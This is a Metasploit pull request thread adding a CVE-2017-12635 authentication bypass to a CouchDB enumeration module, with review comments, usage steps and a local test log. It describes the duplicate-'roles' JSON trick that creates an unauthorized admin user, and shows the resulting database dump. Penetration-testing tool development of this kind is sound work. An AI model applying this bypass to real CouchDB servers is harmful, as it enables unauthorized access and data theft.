Couchdb enum enhancement
rapid7/metasploit-framework pull request #10648
Opened 2018-09-15 21:46 UTC by beatnik

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/couchdb/couchdb_enum`
- [ ] `set rhost 1.1.1.1`
- [ ] `set createuser true`
- [ ] `exploit`
- [ ] Database dump with created user works
- [ ] Database dump with existing user works
- [ ] Database dump without credential doesn't work - As it should
- [ ] Documentation updated.

2018-12-17 16:01 UTC, wvu requested changes

2018-12-17 16:09 UTC, bcoles commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +    data = "{
A Has would be appropriate for JSON data, which can be represented with something like this:

```ruby
data = {
  :type     => 'user',
  :name     => username,
  :roles    => [roles],
  :roles    => [],
  :password => password
}.to_json
```

Although the duplicate `roles` would likely be problematic. The first instance would be overwritten by the first. Not sure if this is necessary or an oversight.

2018-12-17 16:12 UTC, bcoles commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +    data = "{
Welp. The advisory suggests it's mandatory:

> The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user.

2018-12-17 17:09 UTC, wvu requested changes

2018-12-17 17:09 UTC, wvu-r7 commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +      'Author'         => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>',
You need to credit Max Justicz for the vuln discovery.

2019-01-07 17:23 UTC, wvu-r7 commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +    return CheckCode::Unknown if version.version.empty?
This method does not work because `CheckCode` is undefined in an aux context. You need `Exploit::CheckCode`. Resolved myself.

2019-01-07 17:32 UTC, wvu-r7 commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +           print_bad("Error retrieving database. Consider providing credentials.")
This code path may require setting `CREATEUSER`. Added to the message.

2019-01-07 17:37 UTC, wvu approved these changes
Since the delay was our fault, I've handled all the review comments myself.

2019-01-07 17:47 UTC, wvu-r7 commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +        OptString.new('HttpPassword', [true, 'CouchDB Password', 'password']),
Changed to random password.

2019-01-07 17:49 UTC, wvu-r7 commented
```
msf5 auxiliary(scanner/couchdb/couchdb_enum) > check

[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
[*] 127.0.0.1:5984 - The target appears to be vulnerable.
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run

[*] 127.0.0.1:5984 - Enumerating Databases...
[+] 127.0.0.1:5984 - Databases:

[
  "_global_changes",
  "_replicator",
  "_users"
]

[+] 127.0.0.1:5984 - File saved in: /Users/wvu/.msf4/loot/20190107114845_default_127.0.0.1_couchdb.enum_792294.bin
[-] 127.0.0.1:5984 - Error retrieving database. Consider providing credentials or setting CREATEUSER and rerunning.
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true
createuser => true
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run

[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
[+] 127.0.0.1:5984 - User ALBtLdkDHEzW created with password oSYuFIhejpUn. Connect to http://127.0.0.1:5984/_utils/ to login.
[*] 127.0.0.1:5984 - Enumerating Databases...
[+] 127.0.0.1:5984 - Databases:

[
  "_global_changes",
  "_replicator",
  "_users"
]

[+] 127.0.0.1:5984 - File saved in: /Users/wvu/.msf4/loot/20190107114851_default_127.0.0.1_couchdb.enum_098741.bin
[+] 127.0.0.1:5984 - _global_changes saved in: /Users/wvu/.msf4/loot/20190107114851_default_127.0.0.1_couchdb._global__466890.bin
[+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107114851_default_127.0.0.1_couchdb._replica_656699.bin
[+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107114851_default_127.0.0.1_couchdb._users_818218.bin
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/couchdb/couchdb_enum) >
```

2019-01-07 17:51 UTC, wvu-r7 commented on documentation/modules/auxiliary/scanner/couchdb/couchdb_enum.md
> +  Standard versus with credential creation
This should be outside the code block. Resolved.

2019-01-07 18:02 UTC, wvu-r7 commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
>      if datastore['SERVERINFO']
This needs to be moved below `CREATEUSER`. Resolved.

2019-01-07 18:11 UTC, wvu-r7 commented on modules/auxiliary/scanner/couchdb/couchdb_enum.rb
> +        'authorization' => @auth
This isn't set anywhere, so it doesn't work. Resolved.

2019-01-07 18:54 UTC, merged

2019-01-07 18:54 UTC, wvu-r7 commented
https://github.com/rapid7/metasploit-framework/commit/3a726554e9b084acc5a3e12bc4497f41fc58c0fb

2019-01-07 18:56 UTC, wvu-r7 commented
# Release Notes

This adds CVE-2017-12635 authentication bypass support to `auxiliary/scanner/couchdb/couchdb_enum`.